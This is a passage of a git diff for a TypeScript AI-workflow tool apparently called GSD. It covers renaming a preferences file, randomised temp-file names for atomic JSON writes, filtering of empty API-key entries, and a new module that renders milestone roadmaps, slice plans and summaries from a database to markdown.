+      writeCodebaseMap(basePath, result.content);
+      ctx.ui.notify(`Codebase map generated: ${result.fileCount} files`, "info");
+    }
+  } catch {
+    // Non-fatal — codebase map generation failure should never block project init
+  }
+
   ctx.ui.notify("GSD initialized. Starting your first milestone...", "info");
 
   return { completed: true, bootstrapped: true };
@@ -414,9 +434,9 @@ function bootstrapGsdDirectory(
   const gsd = gsdRoot(basePath);
   mkdirSync(join(gsd, "milestones"), { recursive: true });
 
-  // Write preferences.md from wizard answers
+  // Write PREFERENCES.md from wizard answers
   const preferencesContent = buildPreferencesFile(prefs);
-  writeFileSync(join(gsd, "preferences.md"), preferencesContent, "utf-8");
+  writeFileSync(join(gsd, "PREFERENCES.md"), preferencesContent, "utf-8");
 
   // Seed CONTEXT.md with detected project signals
   const contextContent = buildContextSeed(signals);
diff --git a/src/resources/extensions/gsd/interrupted-session.ts b/src/resources/extensions/gsd/interrupted-session.ts
index f4f65a10f..5dae6f52c 100644
--- a/src/resources/extensions/gsd/interrupted-session.ts
+++ b/src/resources/extensions/gsd/interrupted-session.ts
@@ -65,8 +65,7 @@ export function isBootstrapCrashLock(lock: LockData | null): boolean {
   return !!(
     lock &&
     lock.unitType === "starting" &&
-    lock.unitId === "bootstrap" &&
-    lock.completedUnits === 0
+    lock.unitId === "bootstrap"
   );
 }
 
diff --git a/src/resources/extensions/gsd/journal.ts b/src/resources/extensions/gsd/journal.ts
index 9b1fa9487..5b7003781 100644
--- a/src/resources/extensions/gsd/journal.ts
+++ b/src/resources/extensions/gsd/journal.ts
@@ -32,7 +32,12 @@ export type JournalEventType =
   | "milestone-transition"
   | "stuck-detected"
   | "sidecar-dequeue"
-  | "iteration-end";
+  | "iteration-end"
+  | "worktree-enter"
+  | "worktree-create-failed"
+  | "worktree-skip"
+  | "worktree-merge-start"
+  | "worktree-merge-failed";
 
 /** A single structured event in the journal. */
 export interface JournalEntry {
diff --git a/src/resources/extensions/gsd/json-persistence.ts b/src/resources/extensions/gsd/json-persistence.ts
index 8c6c2776c..6aeef5720 100644
--- a/src/resources/extensions/gsd/json-persistence.ts
+++ b/src/resources/extensions/gsd/json-persistence.ts
@@ -1,5 +1,6 @@
-import { existsSync, readFileSync, writeFileSync, mkdirSync, renameSync } from "node:fs";
+import { existsSync, readFileSync, writeFileSync, mkdirSync, renameSync, unlinkSync } from "node:fs";
 import { dirname } from "node:path";
+import { randomBytes } from "node:crypto";
 
 /**
  * Load a JSON file with validation, returning a default on failure.
@@ -51,9 +52,11 @@ export function loadJsonFileOrNull<T>(
 export function saveJsonFile<T>(filePath: string, data: T): void {
   try {
     mkdirSync(dirname(filePath), { recursive: true });
-    const tmp = filePath + ".tmp";
+    // Use randomized tmp suffix to prevent concurrent-write data loss
+    const tmp = `${filePath}.tmp.${randomBytes(4).toString("hex")}`;
     writeFileSync(tmp, JSON.stringify(data, null, 2) + "\n", "utf-8");
     renameSync(tmp, filePath);
+    // No cleanup needed — renameSync atomically removes tmp on success
   } catch {
     // Non-fatal — don't let persistence failures break operation
   }
@@ -66,7 +69,7 @@ export function saveJsonFile<T>(filePath: string, data: T): void {
 export function writeJsonFileAtomic<T>(filePath: string, data: T): void {
   try {
     mkdirSync(dirname(filePath), { recursive: true });
-    const tmp = filePath + ".tmp";
+    const tmp = `${filePath}.tmp.${randomBytes(4).toString("hex")}`;
     writeFileSync(tmp, JSON.stringify(data, null, 2), "utf-8");
     renameSync(tmp, filePath);
   } catch {
diff --git a/src/resources/extensions/gsd/key-manager.ts b/src/resources/extensions/gsd/key-manager.ts
index db67fd81b..17bd3cb31 100644
--- a/src/resources/extensions/gsd/key-manager.ts
+++ b/src/resources/extensions/gsd/key-manager.ts
@@ -150,22 +150,13 @@ export interface KeyStatus {
  */
 export function getAllKeyStatuses(auth: AuthStorage): KeyStatus[] {
   return PROVIDER_REGISTRY.map((provider) => {
-    const creds = auth.getCredentialsForProvider(provider.id);
+    const rawCreds = auth.getCredentialsForProvider(provider.id);
+    // Filter out empty-key entries (left by legacy removeProviderToken or skipped onboarding)
+    const creds = rawCreds.filter((c) => !(c.type === "api_key" && !(c as ApiKeyCredential).key));
     const envKey = provider.envVar ? process.env[provider.envVar] : undefined;
 
     if (creds.length > 0) {
       const firstCred = creds[0];
-      // Skip empty keys (from skipped onboarding)
-      if (firstCred.type === "api_key" && !(firstCred as ApiKeyCredential).key) {
-        return {
-          provider,
-          configured: false,
-          source: "none" as const,
-          credentialCount: 0,
-          description: "empty key (skipped setup)",
-          backedOff: false,
-        };
-      }
       const desc =
         creds.length > 1
           ? `${creds.length} keys (round-robin)`
@@ -275,7 +266,7 @@ export async function handleAddKey(
   } else {
     // Interactive provider picker
     const options = PROVIDER_REGISTRY.map((p) => {
-      const creds = auth.getCredentialsForProvider(p.id);
+      const creds = auth.getCredentialsForProvider(p.id).filter((c) => !(c.type === "api_key" && !(c as ApiKeyCredential).key));
       const existing = creds.length > 0 ? " (configured)" : "";
       return `[${p.category}] ${p.label}${existing}`;
     });
@@ -360,7 +351,7 @@ export async function handleRemoveKey(
   } else {
     // Show only configured providers
     const configured = PROVIDER_REGISTRY.filter((p) => {
-      const creds = auth.getCredentialsForProvider(p.id);
+      const creds = auth.getCredentialsForProvider(p.id).filter((c) => !(c.type === "api_key" && !(c as ApiKeyCredential).key));
       return creds.length > 0;
     });
 
@@ -619,7 +610,7 @@ export async function handleRotateKey(
     // Show only configured API key providers
     const configured = PROVIDER_REGISTRY.filter((p) => {
       const creds = auth.getCredentialsForProvider(p.id);
-      return creds.some((c) => c.type === "api_key");
+      return creds.some((c) => c.type === "api_key" && (c as ApiKeyCredential).key);
     });
 
     if (configured.length === 0) {
@@ -788,7 +779,7 @@ export function runKeyDoctor(auth: AuthStorage): DoctorFinding[] {
     if (!envValue) continue;
 
     const creds = auth.getCredentialsForProvider(provider.id);
-    const apiKey = creds.find((c) => c.type === "api_key") as ApiKeyCredential | undefined;
+    const apiKey = creds.find((c) => c.type === "api_key" && (c as ApiKeyCredential).key) as ApiKeyCredential | undefined;
     if (apiKey?.key && apiKey.key !== envValue) {
       findings.push({
         severity: "warning",
diff --git a/src/resources/extensions/gsd/markdown-renderer.ts b/src/resources/extensions/gsd/markdown-renderer.ts
new file mode 100644
index 000000000..6f3ab0f45
--- /dev/null
+++ b/src/resources/extensions/gsd/markdown-renderer.ts
@@ -0,0 +1,1126 @@
+// GSD Markdown Renderer — DB → Markdown file generation
+//
+// Transforms DB state into correct markdown files on disk.
+// Each render function reads from DB (with disk fallback),
+// patches content to match DB status, writes atomically to disk,
+// stores updated content in the artifacts table, and invalidates caches.
+//
+// Critical invariant: rendered markdown must round-trip through
+// parseRoadmap(), parsePlan(), parseSummary() in files.ts.
+
+import { readFileSync, existsSync, mkdirSync } from "node:fs";
+import { logWarning } from "./workflow-logger.js";
+import { isClosedStatus } from "./status-guards.js";
+import { join, relative } from "node:path";
+import { createRequire } from "node:module";
+import {
+  getAllMilestones,
+  getMilestone,
+  getMilestoneSlices,
+  getSliceTasks,
+  getTask,
+  getSlice,
+  getArtifact,
+  insertArtifact,
+  getGateResults,
+} from "./gsd-db.js";
+import type { MilestoneRow, SliceRow, TaskRow, ArtifactRow } from "./gsd-db.js";
+import type { GateRow } from "./types.js";
+import {
+  resolveMilestoneFile,
+  resolveSliceFile,
+  resolveSlicePath,
+  resolveTasksDir,
+  gsdRoot,
+  buildTaskFileName,
+  buildSliceFileName,
+} from "./paths.js";
+import { saveFile, clearParseCache } from "./files.js";
+import { invalidateStateCache } from "./state.js";
+import { clearPathCache } from "./paths.js";
+
+// ─── Helpers ──────────────────────────────────────────────────────────────
+
+/**
+ * Convert an absolute file path to a .gsd-relative artifact path.
+ * E.g. "/project/.gsd/milestones/M001/M001-ROADMAP.md" → "milestones/M001/M001-ROADMAP.md"
+ */
+function toArtifactPath(absPath: string, basePath: string): string {
+  const root = gsdRoot(basePath);
+  const rel = relative(root, absPath);
+  // Normalize to forward slashes for consistent DB keys
+  return rel.replace(/\\/g, "/");
+}
+
+/**
+ * Invalidate all caches after a disk write.
+ */
+function invalidateCaches(): void {
+  invalidateStateCache();
+  clearPathCache();
+  clearParseCache();
+}
+
+/**
+ * Load artifact content from DB first, falling back to reading from disk.
+ * On disk fallback, stores the content in the artifacts table for future use.
+ * Returns null if content is unavailable from both sources.
+ */
+function loadArtifactContent(
+  artifactPath: string,
+  absPath: string | null,
+  opts: {
+    artifact_type: string;
+    milestone_id: string;
+    slice_id?: string;
+    task_id?: string;
+  },
+): string | null {
+  // Try DB first
+  const artifact = getArtifact(artifactPath);
+  if (artifact && artifact.full_content) {
+    return artifact.full_content;
+  }
+
+  // Fall back to disk
+  if (!absPath) {
+    process.stderr.write(
+      `markdown-renderer: artifact not found in DB or on disk: ${artifactPath}\n`,
+    );
+    return null;
+  }
+
+  let content: string;
+  try {
+    content = readFileSync(absPath, "utf-8");
+  } catch {
+    logWarning("renderer", `cannot read file from disk: ${absPath}`);
+    return null;
+  }
+
+  // Store in DB for future use (graceful degradation path)
+  try {
+    insertArtifact({
+      path: artifactPath,
+      artifact_type: opts.artifact_type,
+      milestone_id: opts.milestone_id,
+      slice_id: opts.slice_id ?? null,
+      task_id: opts.task_id ?? null,
+      full_content: content,
+    });
+  } catch {
+    // Non-fatal: we have the content, DB storage is best-effort
+    logWarning("renderer", `failed to store disk fallback in DB: ${artifactPath}`);
+  }
+
+  return content;
+}
+
+/**
+ * Write rendered content to disk and update the artifacts table.
+ */
+async function writeAndStore(
+  absPath: string,
+  artifactPath: string,
+  content: string,
+  opts: {
+    artifact_type: string;
+    milestone_id: string;
+    slice_id?: string;
+    task_id?: string;
+  },
+): Promise<void> {
+  await saveFile(absPath, content);
+
+  try {
+    insertArtifact({
+      path: artifactPath,
+      artifact_type: opts.artifact_type,
+      milestone_id: opts.milestone_id,
+      slice_id: opts.slice_id ?? null,
+      task_id: opts.task_id ?? null,
+      full_content: content,
+    });
+  } catch {
+    // Non-fatal: file is on disk, DB is best-effort
+    logWarning("renderer", `failed to update artifact in DB: ${artifactPath}`);
+  }
+
+  invalidateCaches();
+}
+
+function renderRoadmapMarkdown(milestone: MilestoneRow, slices: SliceRow[]): string {
+  const lines: string[] = [];
+
+  lines.push(`# ${milestone.id}: ${milestone.title || milestone.id}`);
+  lines.push("");
+  lines.push(`**Vision:** ${milestone.vision}`);
+  lines.push("");
+
+  if (milestone.success_criteria.length > 0) {
+    lines.push("## Success Criteria");
+    lines.push("");
+    for (const criterion of milestone.success_criteria) {
+      lines.push(`- ${criterion}`);
+    }
+    lines.push("");
+  }
+
+  lines.push("## Slices");
+  lines.push("");
+  for (const slice of slices) {
+    const done = slice.status === "complete" ? "x" : " ";
+    const depends = `[${(slice.depends ?? []).join(",")}]`;
+    lines.push(`- [${done}] **${slice.id}: ${slice.title}** \`risk:${slice.risk}\` \`depends:${depends}\``);
+    lines.push(`  > After this: ${slice.demo}`);
+    lines.push("");
+  }
+
+  if (milestone.boundary_map_markdown.trim()) {
+    lines.push("## Boundary Map");
+    lines.push("");
+    lines.push(milestone.boundary_map_markdown.trim());
+    lines.push("");
+  }
+
+  return `${lines.join("\n").trimEnd()}\n`;
+}
+
+function renderTaskPlanMarkdown(task: TaskRow, taskGates: GateRow[] = []): string {
+  const estimatedSteps = Math.max(1, task.description.trim().split(/\n+/).filter(Boolean).length || 1);
+  const estimatedFiles = task.files.length > 0
+    ? task.files.length
+    : task.expected_output.length > 0
+      ? task.expected_output.length
+      : task.inputs.length > 0
+        ? task.inputs.length
+        : 1;
+
+  const lines: string[] = [];
+  lines.push("---");
+  lines.push(`estimated_steps: ${estimatedSteps}`);
+  lines.push(`estimated_files: ${estimatedFiles}`);
+  lines.push("skills_used: []");
+  lines.push("---");
+  lines.push("");
+  lines.push(`# ${task.id}: ${task.title || task.id}`);
+  lines.push("");
+
+  if (task.description.trim()) {
+    lines.push(task.description.trim());
+    lines.push("");
+  }
+
+  lines.push("## Inputs");
+  lines.push("");
+  if (task.inputs.length > 0) {
+    for (const input of task.inputs) {
+      lines.push(`- \`${input}\``);
+    }
+  } else {
+    lines.push("- None specified.");
+  }
+  lines.push("");
+
+  lines.push("## Expected Output");
+  lines.push("");
+  if (task.expected_output.length > 0) {
+    for (const output of task.expected_output) {
+      lines.push(`- \`${output}\``);
+    }
+  } else if (task.files.length > 0) {
+    for (const file of task.files) {
+      lines.push(`- \`${file}\``);
+    }
+  } else {
+    lines.push("- Update the implementation and proof artifacts needed for this task.");
+  }
+  lines.push("");
+
+  lines.push("## Verification");
+  lines.push("");
+  lines.push(task.verify.trim() || "- Verify the task outcome with the slice-level checks.");
+  lines.push("");
+
+  if (task.observability_impact.trim()) {
+    lines.push("## Observability Impact");
+    lines.push("");
+    lines.push(task.observability_impact.trim());
+    lines.push("");
+  }
+
+  // ── Quality Gate Sections (Q5/Q6/Q7) ──────────────────────────────────
+  const gateLabels: Record<string, string> = { Q5: "Failure Modes", Q6: "Load Profile", Q7: "Negative Tests" };
+  for (const [gid, label] of Object.entries(gateLabels)) {
+    const gate = taskGates.find(g => g.gate_id === gid && g.status === "complete");
+    if (gate && gate.verdict !== "omitted") {
+      lines.push(`## ${label}`);
+      lines.push("");
+      lines.push(gate.findings.trim() || `- **Verdict:** ${gate.verdict}\n- **Rationale:** ${gate.rationale}`);
+      lines.push("");
+    }
+  }
+
+  return `${lines.join("\n").trimEnd()}\n`;
+}
+
+function renderSlicePlanMarkdown(slice: SliceRow, tasks: TaskRow[], gates: GateRow[] = []): string {
+  const lines: string[] = [];
+
+  lines.push(`# ${slice.id}: ${slice.title || slice.id}`);
+  lines.push("");
+  lines.push(`**Goal:** ${slice.goal}`);
+  lines.push(`**Demo:** ${slice.demo}`);
+  lines.push("");
+
+  lines.push("## Must-Haves");
+  lines.push("");
+  if (slice.success_criteria.trim()) {
+    for (const line of slice.success_criteria.split(/\n+/).map((entry) => entry.trim()).filter(Boolean)) {
+      lines.push(line.startsWith("-") ? line : `- ${line}`);
+    }
+  } else {
+    lines.push("- Complete the planned slice outcomes.");
+  }
+  lines.push("");
+
+  // ── Quality Gate Sections (Q3/Q4) ────────────────────────────────────
+  const q3 = gates.find(g => g.gate_id === "Q3" && g.status === "complete");
+  if (q3 && q3.verdict !== "omitted") {
+    lines.push("## Threat Surface");
+    lines.push("");
+    lines.push(q3.findings.trim() || `- **Verdict:** ${q3.verdict}\n- **Rationale:** ${q3.rationale}`);
+    lines.push("");
+  }
+
+  const q4 = gates.find(g => g.gate_id === "Q4" && g.status === "complete");
+  if (q4 && q4.verdict !== "omitted") {
+    lines.push("## Requirement Impact");
+    lines.push("");
+    lines.push(q4.findings.trim() || `- **Verdict:** ${q4.verdict}\n- **Rationale:** ${q4.rationale}`);
+    lines.push("");
+  }
+
+  if (slice.proof_level.trim()) {
+    lines.push("## Proof Level");
+    lines.push("");
+    lines.push(`- This slice proves: ${slice.proof_level.trim()}`);
+    lines.push("");
+  }
+
+  if (slice.integration_closure.trim()) {
+    lines.push("## Integration Closure");
+    lines.push("");
+    lines.push(slice.integration_closure.trim());
+    lines.push("");
+  }
+
+  lines.push("## Verification");
+  lines.push("");
+  if (slice.observability_impact.trim()) {
+    const verificationLines = slice.observability_impact
+      .split(/\n+/)
+      .map((entry) => entry.trim())
+      .filter(Boolean);
+    for (const line of verificationLines) {
+      lines.push(line.startsWith("-") ? line : `- ${line}`);
+    }
+  } else {
+    lines.push("- Run the task and slice verification checks for this slice.");
+  }
+  lines.push("");
+
+  lines.push("## Tasks");
+  lines.push("");
+  for (const task of tasks) {
+    const done = isClosedStatus(task.status) ? "x" : " ";
+    const estimate = task.estimate.trim() ? ` \`est:${task.estimate.trim()}\`` : "";
+    lines.push(`- [${done}] **${task.id}: ${task.title || task.id}**${estimate}`);
+    if (task.description.trim()) {
+      lines.push(`  ${task.description.trim()}`);
+    }
+    if (task.files.length > 0) {
+      lines.push(`  - Files: ${task.files.map((file) => `\`${file}\``).join(", ")}`);
+    }
+    if (task.verify.trim()) {
+      lines.push(`  - Verify: ${task.verify.trim()}`);
+    }
+    lines.push("");
+  }
+
+  const filesLikelyTouched = Array.from(new Set(tasks.flatMap((task) => task.files)));
+  if (filesLikelyTouched.length > 0) {
+    lines.push("## Files Likely Touched");
+    lines.push("");
+    for (const file of filesLikelyTouched) {
+      lines.push(`- ${file}`);
+    }
+    lines.push("");
+  }
+
+  return `${lines.join("\n").trimEnd()}\n`;
+}
+
+export async function renderPlanFromDb(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+): Promise<{ planPath: string; taskPlanPaths: string[]; content: string }> {
+  const slice = getSlice(milestoneId, sliceId);
+  if (!slice) {
+    throw new Error(`slice ${milestoneId}/${sliceId} not found`);
+  }
+
+  const tasks = getSliceTasks(milestoneId, sliceId);
+  if (tasks.length === 0) {
+    throw new Error(`no tasks found for ${milestoneId}/${sliceId}`);
+  }
+
+  const slicePath = resolveSlicePath(basePath, milestoneId, sliceId)
+    ?? join(gsdRoot(basePath), "milestones", milestoneId, "slices", sliceId);
+  const absPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN")
+    ?? join(slicePath, `${sliceId}-PLAN.md`);
+  const artifactPath = toArtifactPath(absPath, basePath);
+  const sliceGates = getGateResults(milestoneId, sliceId, "slice");
+  const content = renderSlicePlanMarkdown(slice, tasks, sliceGates);
+
+  await writeAndStore(absPath, artifactPath, content, {
+    artifact_type: "PLAN",
+    milestone_id: milestoneId,
+    slice_id: sliceId,
+  });
+
+  const taskPlanPaths: string[] = [];
+  for (const task of tasks) {
+    const rendered = await renderTaskPlanFromDb(basePath, milestoneId, sliceId, task.id);
+    taskPlanPaths.push(rendered.taskPlanPath);
+  }
+
+  return { planPath: absPath, taskPlanPaths, content };
+}
+
+export async function renderTaskPlanFromDb(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+  taskId: string,
+): Promise<{ taskPlanPath: string; content: string }> {
+  const task = getTask(milestoneId, sliceId, taskId);
+  if (!task) {
+    throw new Error(`task ${milestoneId}/${sliceId}/${taskId} not found`);
+  }
+
+  const tasksDir = resolveTasksDir(basePath, milestoneId, sliceId)
+    ?? join(gsdRoot(basePath), "milestones", milestoneId, "slices", sliceId, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  const absPath = join(tasksDir, buildTaskFileName(taskId, "PLAN"));
+  const artifactPath = toArtifactPath(absPath, basePath);
+  const taskGates = getGateResults(milestoneId, sliceId, "task").filter(g => g.task_id === taskId);
+  const content = task.full_plan_md.trim() ? task.full_plan_md : renderTaskPlanMarkdown(task, taskGates);
+
+  await writeAndStore(absPath, artifactPath, content, {
+    artifact_type: "PLAN",
+    milestone_id: milestoneId,
+    slice_id: sliceId,
+    task_id: taskId,
+  });
+
+  return { taskPlanPath: absPath, content };
+}
+
+export async function renderRoadmapFromDb(
+  basePath: string,
+  milestoneId: string,
+): Promise<{ roadmapPath: string; content: string }> {
+  const milestone = getMilestone(milestoneId);
+  if (!milestone) {
+    throw new Error(`milestone ${milestoneId} not found`);
+  }
+
+  const slices = getMilestoneSlices(milestoneId);
+  const absPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP") ??
+    join(gsdRoot(basePath), "milestones", milestoneId, `${milestoneId}-ROADMAP.md`);
+  const artifactPath = toArtifactPath(absPath, basePath);
+  const content = renderRoadmapMarkdown(milestone, slices);
+
+  await writeAndStore(absPath, artifactPath, content, {
+    artifact_type: "ROADMAP",
+    milestone_id: milestoneId,
+  });
+
+  return { roadmapPath: absPath, content };
+}
+
+// ─── Roadmap Checkbox Rendering ───────────────────────────────────────────
+
+/**
+ * Render roadmap checkbox states from DB.
+ *
+ * For each slice in the milestone, sets [x] if status === 'complete',
+ * [ ] otherwise. Handles bidirectional updates (can uncheck previously
+ * checked slices if DB says pending).
+ *
+ * @returns true if the roadmap was written, false on skip/error
+ */
+export async function renderRoadmapCheckboxes(
+  basePath: string,
+  milestoneId: string,
+): Promise<boolean> {
+  const slices = getMilestoneSlices(milestoneId);
+  if (slices.length === 0) {
+    process.stderr.write(
+      `markdown-renderer: no slices found for milestone ${milestoneId}\n`,
+    );
+    return false;
+  }
+
+  const absPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
+  const artifactPath = absPath ? toArtifactPath(absPath, basePath) : null;
+
+  // Load content from DB (with disk fallback)
+  let content: string | null = null;
+  if (artifactPath) {
+    content = loadArtifactContent(artifactPath, absPath, {
+      artifact_type: "ROADMAP",
+      milestone_id: milestoneId,
+    });
+  }
+
+  if (!content) {
+    process.stderr.write(
+      `markdown-renderer: no roadmap content available for ${milestoneId}\n`,
+    );
+    return false;
+  }
+
+  // Apply checkbox patches for each slice
+  let updated = content;
+  for (const slice of slices) {
+    const isDone = slice.status === "complete";
+    const sid = slice.id;
+
+    if (isDone) {
+      // Set [x]: replace "- [ ] **S01:" with "- [x] **S01:"
+      updated = updated.replace(
+        new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${sid}:`, "m"),
+        `$1[x] **${sid}:`,
+      );
+    } else {
+      // Set [ ]: replace "- [x] **S01:" with "- [ ] **S01:"
+      updated = updated.replace(
+        new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${sid}:`, "mi"),
+        `$1[ ] **${sid}:`,
+      );
+    }
+  }
+
+  if (!absPath) return false;
+
+  await writeAndStore(absPath, artifactPath!, updated, {
+    artifact_type: "ROADMAP",
+    milestone_id: milestoneId,
+  });
+
+  return true;
+}
+
+// ─── Plan Checkbox Rendering ──────────────────────────────────────────────
+
+/**
+ * Render plan checkbox states from DB.
+ *
+ * For each task in the slice, sets [x] if status === 'done',
+ * [ ] otherwise. Bidirectional.
+ *
+ * @returns true if the plan was written, false on skip/error
+ */
+export async function renderPlanCheckboxes(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+): Promise<boolean> {
+  const tasks = getSliceTasks(milestoneId, sliceId);
+  if (tasks.length === 0) {
+    process.stderr.write(
+      `markdown-renderer: no tasks found for ${milestoneId}/${sliceId}\n`,
+    );
+    return false;
+  }
+
+  const absPath = resolveSliceFile(basePath, milestoneId, sliceId, "PLAN");
+  const artifactPath = absPath ? toArtifactPath(absPath, basePath) : null;
+
+  let content: string | null = null;
+  if (artifactPath) {
+    content = loadArtifactContent(artifactPath, absPath, {
+      artifact_type: "PLAN",
+      milestone_id: milestoneId,
+      slice_id: sliceId,
+    });
+  }
+
+  if (!content) {
+    process.stderr.write(
+      `markdown-renderer: no plan content available for ${milestoneId}/${sliceId}\n`,
+    );
+    return false;
+  }
+
+  // Apply checkbox patches for each task
+  let updated = content;
+  for (const task of tasks) {
+    const isDone = isClosedStatus(task.status);
+    const tid = task.id;
+
+    if (isDone) {
+      // Set [x]
+      updated = updated.replace(
+        new RegExp(`^(\\s*-\\s+)\\[ \\]\\s+\\*\\*${tid}:`, "m"),
+        `$1[x] **${tid}:`,
+      );
+    } else {
+      // Set [ ]
+      updated = updated.replace(
+        new RegExp(`^(\\s*-\\s+)\\[x\\]\\s+\\*\\*${tid}:`, "mi"),
+        `$1[ ] **${tid}:`,
+      );
+    }
+  }
+
+  if (!absPath) return false;
+
+  await writeAndStore(absPath, artifactPath!, updated, {
+    artifact_type: "PLAN",
+    milestone_id: milestoneId,
+    slice_id: sliceId,
+  });
+
+  return true;
+}
+
+// ─── Task Summary Rendering ───────────────────────────────────────────────
+
+/**
+ * Render a task summary from DB to disk.
+ * Reads full_summary_md from the tasks table and writes it to the appropriate file.
+ *
+ * @returns true if the summary was written, false on skip/error
+ */
+export async function renderTaskSummary(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+  taskId: string,
+): Promise<boolean> {
+  const task = getTask(milestoneId, sliceId, taskId);
+  if (!task || !task.full_summary_md) {
+    return false; // No summary to render — skip silently
+  }
+
+  // Resolve the tasks directory, creating path if needed
+  const slicePath = resolveSlicePath(basePath, milestoneId, sliceId);
+  if (!slicePath) {
+    process.stderr.write(
+      `markdown-renderer: cannot resolve slice path for ${milestoneId}/${sliceId}\n`,
+    );
+    return false;
+  }
+
+  const tasksDir = join(slicePath, "tasks");
+  const fileName = buildTaskFileName(taskId, "SUMMARY");
+  const absPath = join(tasksDir, fileName);
+  const artifactPath = toArtifactPath(absPath, basePath);
+
+  await writeAndStore(absPath, artifactPath, task.full_summary_md, {
+    artifact_type: "SUMMARY",
+    milestone_id: milestoneId,
+    slice_id: sliceId,
+    task_id: taskId,
+  });
+
+  return true;
+}
+
+// ─── Slice Summary Rendering ──────────────────────────────────────────────
+
+/**
+ * Render slice summary and UAT files from DB to disk.
+ * Reads full_summary_md and full_uat_md from the slices table.
+ *
+ * @returns true if at least one file was written, false on skip/error
+ */
+export async function renderSliceSummary(
+  basePath: string,
+  milestoneId: string,
+  sliceId: string,
+): Promise<boolean> {
+  const slice = getSlice(milestoneId, sliceId);
+  if (!slice) {
+    return false; // No slice data — skip silently
+  }
+
+  const slicePath = resolveSlicePath(basePath, milestoneId, sliceId);
+  if (!slicePath) {
+    process.stderr.write(
+      `markdown-renderer: cannot resolve slice path for ${milestoneId}/${sliceId}\n`,
+    );
+    return false;
+  }
+
+  let wrote = false;
+
+  // Write SUMMARY
+  if (slice.full_summary_md) {
+    const summaryName = buildSliceFileName(sliceId, "SUMMARY");
+    const summaryAbs = join(slicePath, summaryName);
+    const summaryArtifact = toArtifactPath(summaryAbs, basePath);
+
+    await writeAndStore(summaryAbs, summaryArtifact, slice.full_summary_md, {
+      artifact_type: "SUMMARY",
+      milestone_id: milestoneId,
+      slice_id: sliceId,
+    });
+    wrote = true;
+  }
+
+  // Write UAT
+  if (slice.full_uat_md) {
+    const uatName = buildSliceFileName(sliceId, "UAT");
+    const uatAbs = join(slicePath, uatName);
+    const uatArtifact = toArtifactPath(uatAbs, basePath);
+
+    await writeAndStore(uatAbs, uatArtifact, slice.full_uat_md, {
+      artifact_type: "UAT",
+      milestone_id: milestoneId,
+      slice_id: sliceId,
+    });
+    wrote = true;
+  }
+
+  return wrote;
+}
+
+// ─── Render All From DB ───────────────────────────────────────────────────
+
+export interface RenderAllResult {
+  rendered: number;
+  skipped: number;
+  errors: string[];
+}
+
+/**
+ * Iterate all milestones, slices, and tasks in the DB and render each artifact to disk.
+ * Returns structured result for inspection.
+ */
+export async function renderAllFromDb(basePath: string): Promise<RenderAllResult> {
+  const result: RenderAllResult = { rendered: 0, skipped: 0, errors: [] };
+  const milestones = getAllMilestones();
+
+  for (const milestone of milestones) {
+    // Render roadmap checkboxes
+    try {
+      const ok = await renderRoadmapCheckboxes(basePath, milestone.id);
+      if (ok) result.rendered++;
+      else result.skipped++;
+    } catch (err) {
+      result.errors.push(`roadmap ${milestone.id}: ${(err as Error).message}`);
+    }
+
+    // Iterate slices
+    const slices = getMilestoneSlices(milestone.id);
+    for (const slice of slices) {
+      // Render plan checkboxes
+      try {
+        const ok = await renderPlanCheckboxes(basePath, milestone.id, slice.id);
+        if (ok) result.rendered++;
+        else result.skipped++;
+      } catch (err) {
+        result.errors.push(
+          `plan ${milestone.id}/${slice.id}: ${(err as Error).message}`,
+        );
+      }
+
+      // Render slice summary
+      try {
+        const ok = await renderSliceSummary(basePath, milestone.id, slice.id);
+        if (ok) result.rendered++;
+        else result.skipped++;
+      } catch (err) {
+        result.errors.push(
+          `slice summary ${milestone.id}/${slice.id}: ${(err as Error).message}`,
+        );
+      }
+
+      // Iterate tasks
+      const tasks = getSliceTasks(milestone.id, slice.id);
+      for (const task of tasks) {
+        try {
+          const ok = await renderTaskSummary(
+            basePath,
+            milestone.id,
+            slice.id,
+            task.id,
+          );
+          if (ok) result.rendered++;
+          else result.skipped++;
+        } catch (err) {
+          result.errors.push(
+            `task summary ${milestone.id}/${slice.id}/${task.id}: ${(err as Error).message}`,
+          );
+        }
+      }
+    }
+  }
+
+  return result;
+}
+
+// ─── Stale Detection ──────────────────────────────────────────────────────
+
+export interface StaleEntry {
+  path: string;
+  reason: string;
+}
+
+/**
+ * Detect stale renders by comparing DB state against file content.
+ *
+ * Checks:
+ * 1. Roadmap checkbox states vs DB slice statuses
+ * 2. Plan checkbox states vs DB task statuses
+ * 3. Missing SUMMARY.md files for complete tasks with full_summary_md
+ * 4. Missing SUMMARY.md/UAT.md files for complete slices with content
+ *
+ * Returns a list of stale entries with file path and reason.
+ * Logs to stderr when stale files are detected.
+ */
+export function detectStaleRenders(basePath: string): StaleEntry[] {
+  // Lazy-load parsers — intentional disk-vs-DB comparison requires parsers
+  const _require = createRequire(import.meta.url);
+  let parseRoadmap: Function, parsePlan: Function;
+  try {
+    const m = _require("./parsers-legacy.ts");
+    parseRoadmap = m.parseRoadmap; parsePlan = m.parsePlan;
+  } catch (e) {
+    logWarning("renderer", `parsers-legacy.ts require failed, falling back to .js: ${(e as Error).message}`);
+    const m = _require("./parsers-legacy.js");
+    parseRoadmap = m.parseRoadmap; parsePlan = m.parsePlan;
+  }
+
+  const stale: StaleEntry[] = [];
+  const milestones = getAllMilestones();
+
+  for (const milestone of milestones) {
+    const slices = getMilestoneSlices(milestone.id);
+
+    // ── Check roadmap checkbox state ──────────────────────────────────
+    const roadmapPath = resolveMilestoneFile(basePath, milestone.id, "ROADMAP");
+    if (roadmapPath && existsSync(roadmapPath)) {
+      try {
+        const content = readFileSync(roadmapPath, "utf-8");
+        const parsed = parseRoadmap(content);
+
+        for (const slice of slices) {
+          const isCompleteInDb = slice.status === "complete";
+          const roadmapSlice = parsed.slices.find((s: { id: string }) => s.id === slice.id);
+          if (!roadmapSlice) continue;
+
+          if (isCompleteInDb && !roadmapSlice.done) {
+            stale.push({
+              path: roadmapPath,
+              reason: `${slice.id} is complete in DB but unchecked in roadmap`,
+            });
